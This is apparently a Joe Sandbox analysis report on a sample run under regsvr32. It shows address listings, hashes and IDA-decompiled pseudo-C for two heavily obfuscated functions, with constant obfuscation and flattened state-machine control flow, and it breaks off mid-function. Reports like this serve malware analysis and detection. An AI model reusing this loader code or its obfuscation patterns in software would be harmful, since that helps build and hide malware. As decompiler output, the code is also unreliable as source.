                                                                                                                0x001ba9de
                                                                                                                0x001ba9e6
                                                                                                                0x001ba9ee
                                                                                                                0x001ba9fa
                                                                                                                0x001ba9ff
                                                                                                                0x001baa05
                                                                                                                0x001baa0a
                                                                                                                0x001baa0f
                                                                                                                0x001baa17
                                                                                                                0x001baa1f
                                                                                                                0x001baa24
                                                                                                                0x001baa2c
                                                                                                                0x001baa34
                                                                                                                0x001baa41
                                                                                                                0x001baa42
                                                                                                                0x001baa46
                                                                                                                0x001baa4e
                                                                                                                0x001baa56
                                                                                                                0x001baa5e
                                                                                                                0x001baa66
                                                                                                                0x001baa6e
                                                                                                                0x001baa76
                                                                                                                0x001baa83
                                                                                                                0x001baa87
                                                                                                                0x001baa8f
                                                                                                                0x001baa95
                                                                                                                0x001baa99
                                                                                                                0x001baaa1
                                                                                                                0x001baaae
                                                                                                                0x001baab2
                                                                                                                0x001baab7
                                                                                                                0x001baabf
                                                                                                                0x001baac7
                                                                                                                0x001baacf
                                                                                                                0x001baad7
                                                                                                                0x001baae1
                                                                                                                0x001baae9
                                                                                                                0x001baaf1
                                                                                                                0x001baaf6
                                                                                                                0x001baafe
                                                                                                                0x001bab06
                                                                                                                0x001bab0b
                                                                                                                0x001bab13
                                                                                                                0x001bab1b
                                                                                                                0x001bab23
                                                                                                                0x001bab28
                                                                                                                0x001bab30
                                                                                                                0x001bab38
                                                                                                                0x001bab47
                                                                                                                0x001bab4a
                                                                                                                0x001bab4e
                                                                                                                0x001bab56
                                                                                                                0x001bab5e
                                                                                                                0x001bab66
                                                                                                                0x001bab6e
                                                                                                                0x001bab76
                                                                                                                0x001bab7e
                                                                                                                0x001bab86
                                                                                                                0x001bab8e
                                                                                                                0x001bab96
                                                                                                                0x001bab9e
                                                                                                                0x001baba6
                                                                                                                0x001babb1
                                                                                                                0x001babbc
                                                                                                                0x001babc7
                                                                                                                0x001babd4
                                                                                                                0x001babd8
                                                                                                                0x001babdd
                                                                                                                0x001babe5
                                                                                                                0x001babed
                                                                                                                0x001babfd
                                                                                                                0x001bac01
                                                                                                                0x001bac09
                                                                                                                0x001bac11
                                                                                                                0x001bac16
                                                                                                                0x001bac22
                                                                                                                0x001bac27
                                                                                                                0x001bac2d
                                                                                                                0x001bac35
                                                                                                                0x001bac48
                                                                                                                0x001bac49
                                                                                                                0x001bac50
                                                                                                                0x001bac5b
                                                                                                                0x001bac69
                                                                                                                0x001bac6d
                                                                                                                0x001bac77
                                                                                                                0x001bac7b
                                                                                                                0x001bac83
                                                                                                                0x001bac8b
                                                                                                                0x001bac93
                                                                                                                0x001bac9b
                                                                                                                0x001baca6
                                                                                                                0x001bacae
                                                                                                                0x001bacb9
                                                                                                                0x001bacc1
                                                                                                                0x001bacc6
                                                                                                                0x001bacce
                                                                                                                0x001bacd6
                                                                                                                0x001bacde
                                                                                                                0x001bace6
                                                                                                                0x001bacf0
                                                                                                                0x001bacf8
                                                                                                                0x001bad00
                                                                                                                0x001bad08
                                                                                                                0x001bad10
                                                                                                                0x001bad18
                                                                                                                0x001bad26
                                                                                                                0x001bad2e
                                                                                                                0x001bad32
                                                                                                                0x001bad37
                                                                                                                0x001bad3c
                                                                                                                0x001bad44
                                                                                                                0x001bad51
                                                                                                                0x001bad55
                                                                                                                0x001bad5d
                                                                                                                0x001bad65
                                                                                                                0x001bad6d
                                                                                                                0x001bad6d
                                                                                                                0x001bad7b
                                                                                                                0x001bae21
                                                                                                                0x001bae3a
                                                                                                                0x001bae3f
                                                                                                                0x001bae46
                                                                                                                0x001baef1
                                                                                                                0x001baef3
                                                                                                                0x001baefb
                                                                                                                0x001bae4c
                                                                                                                0x001bae4c
                                                                                                                0x00000000
                                                                                                                0x001bae4c
                                                                                                                0x001bad7d
                                                                                                                0x001bad83
                                                                                                                0x001badd7
                                                                                                                0x00000000
                                                                                                                0x001bad85
                                                                                                                0x001bad8b
                                                                                                                0x001baee0
                                                                                                                0x001bad91
                                                                                                                0x001bad97
                                                                                                                0x00000000
                                                                                                                0x001bad9d
                                                                                                                0x001badb0
                                                                                                                0x001badb9
                                                                                                                0x001badbe
                                                                                                                0x001badc1
                                                                                                                0x001badca
                                                                                                                0x001badd0
                                                                                                                0x00000000
                                                                                                                0x001badd0
                                                                                                                0x001badca
                                                                                                                0x001bad97
                                                                                                                0x001bad8b
                                                                                                                0x001bad83
                                                                                                                0x001baefe
                                                                                                                0x001baf0a
                                                                                                                0x001baf0a
                                                                                                                0x001bae96
                                                                                                                0x001baea6
                                                                                                                0x001baeab
                                                                                                                0x001baeb2
                                                                                                                0x001baebe
                                                                                                                0x00000000
                                                                                                                0x001baeb4
                                                                                                                0x001baeb4
                                                                                                                0x00000000
                                                                                                                0x001baeb4
                                                                                                                0x00000000
                                                                                                                0x001baec3
                                                                                                                0x001baec3
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: a{$,i$h,}$p#$ng
                                                                                                                • API String ID: 0-4078567710
                                                                                                                • Opcode ID: 7a6890e93eae165da216647651a540239732827477bf3d10348f991179bc8597
                                                                                                                • Instruction ID: ac82e524b1f032b8f2d1fe19f67bb276c1fd77c6b8498db4d4c325f9594d4984
                                                                                                                • Opcode Fuzzy Hash: 7a6890e93eae165da216647651a540239732827477bf3d10348f991179bc8597
                                                                                                                • Instruction Fuzzy Hash: 7FE1FFB1508380AFD7A8CF65C58AA4BFBE1FB84748F50891DF6D986220C7B58949DF43
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001BE5ED Relevance: 6.5, Strings: 5, Instructions: 255COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 96%
                                                                                                                			E001BE5ED() {
				signed char _t258;
				intOrPtr _t260;
				signed int _t265;
				intOrPtr _t266;
				signed char _t273;
				signed short* _t284;
				signed short* _t285;
				intOrPtr _t295;
				signed short* _t297;
				signed int _t300;
				signed int _t301;
				signed int _t302;
				signed short* _t306;
				void* _t308;

				 *(_t308 + 0x18) = 0xdc83c4;
				 *(_t308 + 0x18) =  *(_t308 + 0x18) + 0x90ce;
				_t265 = 0xb48f8c6;
				 *(_t308 + 0x18) =  *(_t308 + 0x18) + 0xdd0e;
				 *(_t308 + 0x18) =  *(_t308 + 0x18) >> 7;
				 *(_t308 + 0x18) =  *(_t308 + 0x18) ^ 0x00015f2c;
				 *(_t308 + 0x5c) = 0x78e7a4;
				 *(_t308 + 0x5c) =  *(_t308 + 0x5c) + 0xedcb;
				 *(_t308 + 0x5c) =  *(_t308 + 0x5c) ^ 0x007003d5;
				 *(_t308 + 0x34) = 0xd4e3a0;
				 *(_t308 + 0x44) =  *(_t308 + 0x34) * 0x42;
				 *(_t308 + 0x44) =  *(_t308 + 0x44) << 0xd;
				 *(_t308 + 0x44) =  *(_t308 + 0x44) ^ 0x55e5d6ae;
				 *(_t308 + 0x70) = 0x805138;
				_t300 = 0x60;
				 *(_t308 + 0x70) =  *(_t308 + 0x70) / _t300;
				 *(_t308 + 0x70) =  *(_t308 + 0x70) ^ 0x00016b36;
				 *(_t308 + 0x4c) = 0xa4a6d6;
				 *(_t308 + 0x4c) =  *(_t308 + 0x4c) << 0xd;
				 *(_t308 + 0x4c) =  *(_t308 + 0x4c) * 0x6a;
				 *(_t308 + 0x4c) =  *(_t308 + 0x4c) ^ 0xa29b5ad6;
				 *(_t308 + 0x2c) = 0x6044cb;
				 *(_t308 + 0x2c) =  *(_t308 + 0x2c) << 0xe;
				 *(_t308 + 0x2c) =  *(_t308 + 0x2c) + 0x2e14;
				 *(_t308 + 0x2c) =  *(_t308 + 0x2c) * 0x4f;
				 *(_t308 + 0x2c) =  *(_t308 + 0x2c) ^ 0x4eb7f0fd;
				 *(_t308 + 0x48) = 0x727fa8;
				 *(_t308 + 0x48) =  *(_t308 + 0x48) ^ 0x051af560;
				 *(_t308 + 0x48) =  *(_t308 + 0x48) ^ 0x6b2866a6;
				 *(_t308 + 0x48) =  *(_t308 + 0x48) ^ 0x6e468952;
				 *(_t308 + 0x38) = 0xd8f9a2;
				 *(_t308 + 0x38) =  *(_t308 + 0x38) << 3;
				 *(_t308 + 0x38) =  *(_t308 + 0x38) + 0xe988;
				 *(_t308 + 0x38) =  *(_t308 + 0x38) ^ 0x06c2d08c;
				 *(_t308 + 0x14) = 0xcfc368;
				 *(_t308 + 0x14) =  *(_t308 + 0x14) >> 0xa;
				 *(_t308 + 0x14) =  *(_t308 + 0x14) + 0xffff3c6c;
				 *(_t308 + 0x14) =  *(_t308 + 0x14) << 0xd;
				 *(_t308 + 0x14) =  *(_t308 + 0x14) ^ 0xee0b5dfd;
				 *(_t308 + 0x34) = 0x63262e;
				 *(_t308 + 0x34) =  *(_t308 + 0x34) ^ 0x3e4153dc;
				 *(_t308 + 0x34) =  *(_t308 + 0x34) << 6;
				 *(_t308 + 0x34) =  *(_t308 + 0x34) ^ 0x8890e95c;
				 *(_t308 + 0x30) = 0x449e40;
				 *(_t308 + 0x30) =  *(_t308 + 0x30) * 0x64;
				 *(_t308 + 0x30) =  *(_t308 + 0x30) | 0x4bcc7f17;
				 *(_t308 + 0x30) =  *(_t308 + 0x30) ^ 0x5bce8c06;
				 *(_t308 + 0x64) = 0xa8b36a;
				 *(_t308 + 0x64) =  *(_t308 + 0x64) + 0xffff43b1;
				 *(_t308 + 0x64) =  *(_t308 + 0x64) ^ 0x00a36b06;
				 *(_t308 + 0x1c) = 0xf671cb;
				 *(_t308 + 0x1c) =  *(_t308 + 0x1c) | 0x7dbded57;
				 *(_t308 + 0x1c) =  *(_t308 + 0x1c) ^ 0xdb2980f7;
				 *(_t308 + 0x1c) =  *(_t308 + 0x1c) ^ 0xa6d39f78;
				 *(_t308 + 0x18) = 0x62dc7;
				 *(_t308 + 0x18) =  *(_t308 + 0x18) ^ 0xc7761c64;
				 *(_t308 + 0x18) =  *(_t308 + 0x18) + 0xbb1;
				 *(_t308 + 0x18) =  *(_t308 + 0x18) ^ 0xb300d7e4;
				 *(_t308 + 0x18) =  *(_t308 + 0x18) ^ 0x747182db;
				 *(_t308 + 0x3c) = 0x296871;
				 *(_t308 + 0x3c) =  *(_t308 + 0x3c) * 0x72;
				 *(_t308 + 0x3c) =  *(_t308 + 0x3c) ^ 0x0a3d0d86;
				 *(_t308 + 0x3c) =  *(_t308 + 0x3c) ^ 0x184f99ee;
				 *(_t308 + 0x60) = 0xf38101;
				 *(_t308 + 0x60) =  *(_t308 + 0x60) ^ 0xf99bc674;
				 *(_t308 + 0x60) =  *(_t308 + 0x60) ^ 0xf9644c13;
				 *(_t308 + 0x24) = 0xe0439f;
				 *(_t308 + 0x24) =  *(_t308 + 0x24) + 0x9280;
				 *(_t308 + 0x24) =  *(_t308 + 0x24) | 0x3fb3a08c;
				 *(_t308 + 0x24) =  *(_t308 + 0x24) >> 0xa;
				 *(_t308 + 0x24) =  *(_t308 + 0x24) ^ 0x00012914;
				 *(_t308 + 0x40) = 0x8399ff;
				 *(_t308 + 0x40) =  *(_t308 + 0x40) >> 7;
				 *(_t308 + 0x40) =  *(_t308 + 0x40) + 0xffffcbe1;
				 *(_t308 + 0x40) =  *(_t308 + 0x40) ^ 0x000a160d;
				 *(_t308 + 0x68) = 0xbbfe11;
				_t301 = 0x2a;
				 *(_t308 + 0x6c) =  *(_t308 + 0x68) / _t301;
				 *(_t308 + 0x6c) =  *(_t308 + 0x6c) ^ 0x000df844;
				 *(_t308 + 0x24) = 0x908d3;
				 *(_t308 + 0x24) =  *(_t308 + 0x24) << 9;
				 *(_t308 + 0x24) =  *(_t308 + 0x24) + 0xd70e;
				_t302 = 0x62;
				_t297 =  *(_t308 + 0x78);
				_t306 =  *(_t308 + 0x78);
				 *(_t308 + 0x20) =  *(_t308 + 0x24) * 0x78;
				 *(_t308 + 0x20) =  *(_t308 + 0x20) ^ 0x78a1165a;
				 *(_t308 + 0x54) = 0x6343e4;
				_t154 = _t308 + 0x54; // 0x6343e4
				 *(_t308 + 0x54) =  *_t154 / _t302;
				 *(_t308 + 0x54) =  *(_t308 + 0x54) << 0xd;
				 *(_t308 + 0x54) =  *(_t308 + 0x54) ^ 0x206f08ea;
				 *(_t308 + 0x50) = 0x7db93c;
				 *(_t308 + 0x50) =  *(_t308 + 0x50) * 0x39;
				 *(_t308 + 0x50) =  *(_t308 + 0x50) + 0xb497;
				 *(_t308 + 0x50) =  *(_t308 + 0x50) ^ 0x1bfe6ae2;
				while(1) {
					L1:
					while(1) {
						L2:
						L3:
						while(_t265 != 0x6032e4a) {
							if(_t265 == 0x6ffc856) {
								E001B17D2( *(_t308 + 0x58),  *(_t308 + 0x50),  *(_t308 + 0x78));
							} else {
								if(_t265 == 0x899f5fe) {
									_t284 = E001B8EF8( *(_t308 + 0x34), _t308 + 0x7c, __eflags,  *((intOrPtr*)(_t308 + 0x74)),  *(_t308 + 0x48), 0x1c4000);
									_t308 = _t308 + 0xc;
									_t297 = _t284;
									 *(_t308 + 0x78) = _t284;
									_t285 =  *(_t308 + 0x58);
									_t265 = 0x6032e4a;
									 *(_t308 + 0x5c) =  *((intOrPtr*)(_t308 + 0x74)) + _t284;
									continue;
								} else {
									if(_t265 == 0xa25387a) {
										_push( *(_t308 + 0x30));
										_push(0x1a1730);
										_push( *(_t308 + 0x3c));
										 *((char*)(_t308 + 0x1e)) =  *_t297;
										 *((char*)(_t308 + 0x1f)) = _t297[1];
										E001C224C( *((intOrPtr*)(_t308 + 0x90)), __eflags,  *(_t308 + 0x43) & 0x000000ff,  *(_t308 + 0x3a) & 0x000000ff,  *(_t308 + 0x44),  *(_t308 + 0x3c), _t297[1] & 0x000000ff, E001BF5D9( *(_t308 + 0x44),  *(_t308 + 0x20), __eflags), 0x10,  *(_t308 + 0x50),  *(_t308 + 0x70), _t297[1] & 0x000000ff);
										E001BF94B(_t250,  *(_t308 + 0x64),  *((intOrPtr*)(_t308 + 0x7c)),  *((intOrPtr*)(_t308 + 0xa0)),  *(_t308 + 0x54));
										_t308 = _t308 + 0x40;
										 *_t306 = (_t297[2] & 0x000000ff) << 0x00000008 | _t297[2] & 0x000000ff;
										_t258 = _t297[3];
										_t273 = _t297[3];
										_t297 =  &(_t297[4]);
										_t265 = 0xe2ad20d;
										_t306[0x1c] = (_t258 & 0x000000ff) << 0x00000008 | _t273 & 0x000000ff;
										while(1) {
											L1:
											goto L2;
										}
									} else {
										if(_t265 == 0xb48f8c6) {
											_t295 =  *0x1c4218; // 0x0
											_t265 = 0x899f5fe;
											_t285 = _t295 + 0x20;
											 *(_t308 + 0x58) = _t285;
											goto L2;
										} else {
											if(_t265 == 0xe2ad20d) {
												_t260 =  *0x1c4218; // 0x0
												_t265 = 0xe7921c0;
												 *_t285 = _t306;
												_t173 =  &(_t306[0x1e]); // 0x3c
												_t285 = _t173;
												 *(_t308 + 0x58) = _t285;
												 *((intOrPtr*)(_t260 + 4)) =  *((intOrPtr*)(_t260 + 4)) + 1;
												L2:
												continue;
											} else {
												if(_t265 != 0xe7921c0) {
													L18:
													__eflags = _t265 - 0xe7c61bb;
													if(__eflags != 0) {
														while(1) {
															L1:
															while(1) {
																L2:
																goto L3;
															}
														}
													}
												} else {
													asm("sbb ecx, ecx");
													_t265 = (_t265 & 0xff0365f4) + 0x6ffc856;
													continue;
												}
											}
										}
									}
								}
							}
							L21:
							_t266 =  *0x1c4218; // 0x0
							 *(_t266 + 8) =  *(_t266 + 8) & 0x00000000;
							 *((intOrPtr*)(_t266 + 0x1c)) =  *((intOrPtr*)(_t266 + 0x20));
							__eflags = 1;
							return 1;
						}
						_push(_t265);
						_t306 = E001A303A(_t265, 0x50);
						_t308 = _t308 + 0xc;
						__eflags = _t306;
						if(__eflags == 0) {
							_t265 = 0xe7c61bb;
							goto L18;
						} else {
							_t265 = 0xa25387a;
							goto L1;
						}
						goto L21;
					}
				}
			}

















                                                                                                                0x001be5f0
                                                                                                                0x001be5fa
                                                                                                                0x001be602
                                                                                                                0x001be607
                                                                                                                0x001be60f
                                                                                                                0x001be614
                                                                                                                0x001be61c
                                                                                                                0x001be624
                                                                                                                0x001be62c
                                                                                                                0x001be634
                                                                                                                0x001be645
                                                                                                                0x001be649
                                                                                                                0x001be64e
                                                                                                                0x001be656
                                                                                                                0x001be664
                                                                                                                0x001be667
                                                                                                                0x001be66b
                                                                                                                0x001be673
                                                                                                                0x001be67b
                                                                                                                0x001be685
                                                                                                                0x001be689
                                                                                                                0x001be691
                                                                                                                0x001be699
                                                                                                                0x001be69e
                                                                                                                0x001be6ab
                                                                                                                0x001be6af
                                                                                                                0x001be6b7
                                                                                                                0x001be6bf
                                                                                                                0x001be6c7
                                                                                                                0x001be6cf
                                                                                                                0x001be6d7
                                                                                                                0x001be6df
                                                                                                                0x001be6e4
                                                                                                                0x001be6ec
                                                                                                                0x001be6f4
                                                                                                                0x001be6fc
                                                                                                                0x001be701
                                                                                                                0x001be709
                                                                                                                0x001be70e
                                                                                                                0x001be716
                                                                                                                0x001be71e
                                                                                                                0x001be726
                                                                                                                0x001be72b
                                                                                                                0x001be733
                                                                                                                0x001be740
                                                                                                                0x001be744
                                                                                                                0x001be74c
                                                                                                                0x001be754
                                                                                                                0x001be75c
                                                                                                                0x001be764
                                                                                                                0x001be76c
                                                                                                                0x001be774
                                                                                                                0x001be77c
                                                                                                                0x001be784
                                                                                                                0x001be78c
                                                                                                                0x001be794
                                                                                                                0x001be79c
                                                                                                                0x001be7a4
                                                                                                                0x001be7ac
                                                                                                                0x001be7b4
                                                                                                                0x001be7c1
                                                                                                                0x001be7c5
                                                                                                                0x001be7cd
                                                                                                                0x001be7d5
                                                                                                                0x001be7dd
                                                                                                                0x001be7e5
                                                                                                                0x001be7ed
                                                                                                                0x001be7f5
                                                                                                                0x001be7fd
                                                                                                                0x001be807
                                                                                                                0x001be80c
                                                                                                                0x001be814
                                                                                                                0x001be81c
                                                                                                                0x001be821
                                                                                                                0x001be829
                                                                                                                0x001be831
                                                                                                                0x001be83f
                                                                                                                0x001be844
                                                                                                                0x001be84a
                                                                                                                0x001be852
                                                                                                                0x001be85a
                                                                                                                0x001be85f
                                                                                                                0x001be86c
                                                                                                                0x001be86d
                                                                                                                0x001be871
                                                                                                                0x001be875
                                                                                                                0x001be879
                                                                                                                0x001be881
                                                                                                                0x001be889
                                                                                                                0x001be88f
                                                                                                                0x001be893
                                                                                                                0x001be898
                                                                                                                0x001be8a0
                                                                                                                0x001be8ad
                                                                                                                0x001be8b1
                                                                                                                0x001be8b9
                                                                                                                0x001be8c1
                                                                                                                0x001be8c1
                                                                                                                0x001be8c5
                                                                                                                0x001be8c5
                                                                                                                0x00000000
                                                                                                                0x001be8c9
                                                                                                                0x001be8db
                                                                                                                0x001bea92
                                                                                                                0x001be8e1
                                                                                                                0x001be8e7
                                                                                                                0x001bea25
                                                                                                                0x001bea27
                                                                                                                0x001bea2e
                                                                                                                0x001bea32
                                                                                                                0x001bea36
                                                                                                                0x001bea3a
                                                                                                                0x001bea3f
                                                                                                                0x00000000
                                                                                                                0x001be8ed
                                                                                                                0x001be8f3
                                                                                                                0x001be952
                                                                                                                0x001be95e
                                                                                                                0x001be963
                                                                                                                0x001be96f
                                                                                                                0x001be976
                                                                                                                0x001be9b2
                                                                                                                0x001be9cc
                                                                                                                0x001be9d5
                                                                                                                0x001be9e3
                                                                                                                0x001be9e7
                                                                                                                0x001be9ea
                                                                                                                0x001be9ed
                                                                                                                0x001be9f6
                                                                                                                0x001bea02
                                                                                                                0x001be8c1
                                                                                                                0x001be8c1
                                                                                                                0x00000000
                                                                                                                0x001be8c1
                                                                                                                0x001be8f5
                                                                                                                0x001be8fb
                                                                                                                0x001be93b
                                                                                                                0x001be941
                                                                                                                0x001be946
                                                                                                                0x001be949
                                                                                                                0x00000000
                                                                                                                0x001be8fd
                                                                                                                0x001be903
                                                                                                                0x001be923
                                                                                                                0x001be928
                                                                                                                0x001be92d
                                                                                                                0x001be92f
                                                                                                                0x001be92f
                                                                                                                0x001be932
                                                                                                                0x001be936
                                                                                                                0x001be8c5
                                                                                                                0x00000000
                                                                                                                0x001be905
                                                                                                                0x001be90b
                                                                                                                0x001bea79
                                                                                                                0x001bea79
                                                                                                                0x001bea7f
                                                                                                                0x001be8c1
                                                                                                                0x001be8c1
                                                                                                                0x001be8c5
                                                                                                                0x001be8c5
                                                                                                                0x00000000
                                                                                                                0x001be8c5
                                                                                                                0x001be8c5
                                                                                                                0x001be8c1
                                                                                                                0x001be911
                                                                                                                0x001be913
                                                                                                                0x001be91b
                                                                                                                0x00000000
                                                                                                                0x001be91b
                                                                                                                0x001be90b
                                                                                                                0x001be903
                                                                                                                0x001be8fb
                                                                                                                0x001be8f3
                                                                                                                0x001be8e7
                                                                                                                0x001bea98
                                                                                                                0x001bea98
                                                                                                                0x001beaa4
                                                                                                                0x001beaa8
                                                                                                                0x001beaad
                                                                                                                0x001beab2
                                                                                                                0x001beab2
                                                                                                                0x001bea58
                                                                                                                0x001bea61
                                                                                                                0x001bea63
                                                                                                                0x001bea66
                                                                                                                0x001bea68
                                                                                                                0x001bea74
                                                                                                                0x00000000
                                                                                                                0x001bea6a
                                                                                                                0x001bea6a
                                                                                                                0x00000000
                                                                                                                0x001bea6a
                                                                                                                0x00000000
                                                                                                                0x001bea68
                                                                                                                0x001be8c5

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: .&c$qh)$z8%$z8%$Cc
                                                                                                                • API String ID: 0-2743671612
                                                                                                                • Opcode ID: 812566433eab5cc514304cd2885167e5ecdf346cc285e1695f6278dfb2e82faf
                                                                                                                • Instruction ID: 76e3b5c2e920646f95bd4aea24ad2e8057ed6c6da9c209b424b494113ea7f775
                                                                                                                • Opcode Fuzzy Hash: 812566433eab5cc514304cd2885167e5ecdf346cc285e1695f6278dfb2e82faf
                                                                                                                • Instruction Fuzzy Hash: 4BC12F710083819FC358CF65C48A59BFBE1FBD5748F208A1DF6A286260D3B5DA59CF82
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001AC4E5 Relevance: 6.5, Strings: 5, Instructions: 252COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 97%
                                                                                                                			E001AC4E5() {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				void* _t265;
				void* _t273;
				signed int _t274;
				intOrPtr _t275;
				intOrPtr* _t276;
				signed int _t277;
				signed int _t278;
				signed int _t279;
				signed int _t280;
				signed int _t281;
				signed int _t282;
				signed int _t283;
				signed int _t284;
				void* _t285;
				void* _t315;
				signed int* _t319;

				_t319 =  &_v120;
				_v12 = 0x8031c0;
				_v4 = 0;
				_v8 = 0xae329c;
				_v68 = 0xef757d;
				_v16 = 0;
				_t315 = 0x8b00593;
				_t277 = 0x23;
				_v68 = _v68 / _t277;
				_t278 = 0x3f;
				_v68 = _v68 / _t278;
				_v68 = _v68 ^ 0x80001bcc;
				_v112 = 0x89c0de;
				_v112 = _v112 ^ 0xd31acc07;
				_v112 = _v112 | 0xdb55a7c5;
				_v112 = _v112 + 0x9a99;
				_v112 = _v112 ^ 0xdbd84a74;
				_v116 = 0xa850fa;
				_v116 = _v116 + 0xd60d;
				_v116 = _v116 >> 9;
				_v116 = _v116 + 0xbbc1;
				_v116 = _v116 ^ 0x00055f92;
				_v88 = 0xd7caf3;
				_t279 = 0x35;
				_v88 = _v88 / _t279;
				_v88 = _v88 ^ 0xc4b56b1e;
				_v88 = _v88 ^ 0xc4b0f62e;
				_v120 = 0x7b4ef4;
				_v120 = _v120 ^ 0x89e38ecd;
				_t280 = 0x31;
				_v120 = _v120 * 0xd;
				_v120 = _v120 >> 0xb;
				_v120 = _v120 ^ 0x0010d987;
				_v40 = 0xb7a21e;
				_v40 = _v40 | 0xefe266cc;
				_v40 = _v40 ^ 0xeff0c30f;
				_v104 = 0x7cf6b1;
				_v104 = _v104 << 1;
				_v104 = _v104 * 0x75;
				_v104 = _v104 ^ 0x9612fbaa;
				_v104 = _v104 ^ 0xe421d094;
				_v108 = 0xc91341;
				_v108 = _v108 / _t280;
				_v108 = _v108 ^ 0xd16fd725;
				_v108 = _v108 + 0x8f6d;
				_v108 = _v108 ^ 0xd16e859c;
				_v32 = 0x64a429;
				_v32 = _v32 >> 2;
				_v32 = _v32 ^ 0x001a5b9d;
				_v72 = 0x904539;
				_v72 = _v72 + 0xffff5170;
				_v72 = _v72 * 0x53;
				_v72 = _v72 ^ 0x2e8295ef;
				_v36 = 0x815f8a;
				_v36 = _v36 + 0xae82;
				_v36 = _v36 ^ 0x0089e518;
				_v76 = 0x35102d;
				_v76 = _v76 << 3;
				_v76 = _v76 + 0xdd23;
				_v76 = _v76 ^ 0x01aa4224;
				_v80 = 0x7c57ea;
				_t281 = 0x30;
				_v80 = _v80 / _t281;
				_v80 = _v80 << 0x10;
				_v80 = _v80 ^ 0x9725f848;
				_v84 = 0x28968b;
				_t282 = 0x15;
				_t274 = _v16;
				_v84 = _v84 * 0x62;
				_v84 = _v84 / _t282;
				_v84 = _v84 ^ 0x00bee896;
				_v56 = 0x5ac5c0;
				_v56 = _v56 >> 9;
				_v56 = _v56 | 0xd393b6e5;
				_v56 = _v56 ^ 0xd39d981b;
				_v60 = 0x48f323;
				_t283 = 0x59;
				_v60 = _v60 / _t283;
				_v60 = _v60 ^ 0xf9ba1679;
				_v60 = _v60 ^ 0xf9bb0444;
				_v100 = 0x70da32;
				_v100 = _v100 | 0x181a6af5;
				_v100 = _v100 << 3;
				_v100 = _v100 >> 3;
				_v100 = _v100 ^ 0x187445c1;
				_v64 = 0x4cfa42;
				_t284 = 0x1b;
				_v64 = _v64 / _t284;
				_v64 = _v64 << 1;
				_v64 = _v64 ^ 0x0003d254;
				_v92 = 0x2ab664;
				_v92 = _v92 ^ 0xbdfb9acc;
				_v92 = _v92 + 0x75a9;
				_v92 = _v92 ^ 0xbdda7332;
				_v44 = 0x3efb10;
				_v44 = _v44 << 1;
				_v44 = _v44 ^ 0x0073a534;
				_v96 = 0xb8a4ae;
				_v96 = _v96 << 9;
				_v96 = _v96 << 3;
				_v96 = _v96 ^ 0x8a4cd5df;
				_v48 = 0x7b415c;
				_v48 = _v48 * 0x1e;
				_v48 = _v48 ^ 0x0e7e0d60;
				_v24 = 0x277d20;
				_v24 = _v24 << 7;
				_v24 = _v24 ^ 0x13b39931;
				_v52 = 0xc6e76b;
				_v52 = _v52 + 0x3657;
				_v52 = _v52 + 0xffff019d;
				_v52 = _v52 ^ 0x00cfa770;
				_v28 = 0xe2c7ba;
				_v28 = _v28 + 0x82a;
				_v28 = _v28 ^ 0x00eb1868;
				while(1) {
					L1:
					_t285 = 0x5c;
					while(1) {
						_t265 = 0xb32f6ce;
						do {
							L3:
							while(_t315 != 0x2381b6f) {
								if(_t315 == 0x5f1f776) {
									_t275 =  *0x1c4c10; // 0x67d820
									_t276 = _t275 + 0x20c;
									while(1) {
										__eflags =  *_t276 - _t285;
										if(__eflags == 0) {
											break;
										}
										_t276 = _t276 + 2;
										__eflags = _t276;
									}
									_t274 = _t276 + 2;
									_t315 = 0x2381b6f;
									_t265 = 0xb32f6ce;
									continue;
								} else {
									if(_t315 == 0x7314998) {
										E001B3CBE(_v24, _v20, _v52, _v28);
									} else {
										if(_t315 == 0x8b00593) {
											_t315 = 0x5f1f776;
											continue;
										} else {
											if(_t315 != _t265) {
												goto L15;
											} else {
												_t273 = E001A6C71(_t274, _v92, _v44, _v96, _v48, _v20);
												_t319 =  &(_t319[4]);
												_t315 = 0x7314998;
												_v16 = 0 | _t273 == 0x00000000;
												goto L1;
											}
										}
									}
								}
								L18:
								return _v16;
							}
							_push(_v40);
							_push(0x1a110c);
							_push(_v120);
							_t286 = _v116;
							__eflags = E001A3E99(_v116, _v68, _v104, _v116, E001BF5D9(_v116, _v88, __eflags), _t286, _v108, _v32,  &_v20, _v72, _t286, _v112, _v36, _v76, _t286, _v80, _v84);
							_t315 =  ==  ? 0xb32f6ce : 0x88b21bc;
							E001BF94B(_t266, _v56, _v60, _v100, _v64);
							_t319 =  &(_t319[0x15]);
